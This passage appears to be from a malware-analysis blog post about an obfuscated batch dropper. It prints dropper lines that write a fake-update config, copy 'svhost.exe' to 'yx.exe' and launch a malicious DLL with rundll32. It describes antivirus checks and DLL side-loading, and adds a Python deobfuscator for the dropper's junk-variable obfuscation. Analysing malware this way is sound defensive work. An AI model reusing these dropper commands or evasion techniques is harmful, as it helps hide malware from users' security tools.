    :>>"gamepatch\config.ini" echo CheckType=1
    :echo CheckPath=>>"gamepatch\config.ini"
    :echo CheckVerion=5d>>"gamepatch\config.ini"
    :echo InstFile=uqdate.exe>>"gamepatch\config.ini"
    :echo InstParam=C:\HTEMP0\!gjOut!.dll,TrapEntry>>"gamepatch\config.ini"
    :copy /y "svhost.exe" "yx.exe"
    exit
    :qt 
    rundll32.exe c:\HTEMP0\!gjOut!.dll,TrapEntry
    exit

    It is not hard to see from the code that the script checks for security products such as 360 and Tencent PC Manager, and uses the "white plus black" technique (a legitimate executable loading a malicious DLL) to drop and run the sample. Because the script is fairly complex, the next article will analyse it in detail.
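    The following is an added example (not code from the original post) that automates the cleanup shown above for both update.bat and qiaoi.bat: it reads the `set %x%=` lines to learn which variable names are junk, removes every reference to them, and drops the %%Q padding lines. SAMPLE is a constructed excerpt written in the same style as the dropper's update.bat.

```python
import re

# A %name% reference; %temp%, %APPDATA% and the dropper's %l%/%o%/%v%/%e% all match,
# while %~dp0, %%L and %%i do not (they do not start with a letter after the '%').
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
# 'set %l%=' never defines anything (cmd expands it to 'set ='); the dropper uses these
# lines only to "declare" the junk names, so they tell us exactly what to strip.
JUNK_SET_RE = re.compile(r"^set\s+%([A-Za-z_][A-Za-z0-9_]*)%=\s*$", re.IGNORECASE)

# Constructed excerpt in the style of the page's update.bat (not the real file).
SAMPLE = r"""%%Q %%Q %%Q %%Q %%Q %%Q
cls
@echo off
set %l%=
set %o%=
set %v%=
set %e%=
:::::::::::::khyq:::::::::::::
i%l%f%l% %l%e%l%x%l%i%l%s%l%t%l% %l%"%l%%l%%temp%%l%%l%\%l%b%l%u%l%g%l%0%l%.%l%t%l%x%l%t%l%"%l% %l%(%l%g%l%o%l%t%l%o%l% %l%q%l%i%l%a%l%o%l%h%l%c%l%)%l%
:cjmlu %l%%o%%v%%e%%l%%o%%v%%e%
e%o%c%o%h%o%o%o% %o%%o%%~dp0%o%%o%%o%>%o%%o%>%o%%o%"%o%%o%%temp%%o%%o%\%o%b%o%u%o%g%o%0%o%.%o%t%o%x%o%t%o%"%o%
"""


def junk_names(script):
    """Variable names the script 'sets' to nothing, so every %name% expands to ''."""
    names = set()
    for line in script.splitlines():
        m = JUNK_SET_RE.match(line.strip())
        if m:
            names.add(m.group(1).lower())
    return names


def is_padding(line):
    """Lines made only of %%Q tokens are filler that bulks up the file and hides the logic."""
    toks = line.split()
    return bool(toks) and all(t == "%%Q" for t in toks)


def deobfuscate(script):
    """Return the script's real commands, one per list entry, with the junk removed."""
    junk = junk_names(script)
    cleaned = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or is_padding(line) or JUNK_SET_RE.match(line):
            continue
        # Drop only references to junk names; %temp%, %~dp0, %%i etc. are left as they are.
        line = VAR_RE.sub(lambda m: "" if m.group(1).lower() in junk else m.group(0), line)
        line = line.strip()
        if line:
            cleaned.append(line)
    return cleaned


if __name__ == "__main__":
    print("\n".join(deobfuscate(SAMPLE)))
```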


    Original article: https://www.cnblogs.com/ichunqiu/p/8378639.html